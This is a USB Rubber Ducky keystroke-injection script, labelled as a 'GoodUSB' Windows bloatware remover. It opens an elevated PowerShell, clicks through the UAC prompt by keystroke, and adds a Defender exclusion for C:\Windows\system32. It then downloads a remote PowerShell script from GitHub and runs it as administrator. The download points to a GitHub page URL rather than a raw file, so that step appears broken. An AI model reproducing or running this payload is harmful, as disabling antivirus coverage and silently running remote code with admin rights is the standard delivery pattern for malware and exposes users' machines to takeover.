REM Title: Bloatware_removal
REM Author: Galli3r
REM Description: Remove bloatware from your windows computer
REM Target: Windows
REM Version: 1.0
REM Category: GoodUSB
REM ==================================================
REM = Start Program                                  =
REM = Program needs Admin rights                     =
REM ==================================================
DELAY 1000
GUI r
DELAY 750
STRING powershell Start-Process powershell -Verb runAs
CTRL-SHIFT ENTER
DELAY 1500
SHIFT TAB
DELAY 500
ENTER
DELAY 1500
STRING Add-MpPreference -ExclusionPath C:\Windows\system32
ENTER
DELAY 500
REM ==================================================
REM = download Script                                =
REM ==================================================
STRING New-Object System.Net.WebClient | %{$_.DownloadFile('https://github.com/galli3r/files/blob/main/remove_bloatware_regkeys.ps1', 'script.ps1'); Start-Process powershell.exe -Verb runAs -ArgumentList "-File script.ps1"}, exit
ENTER
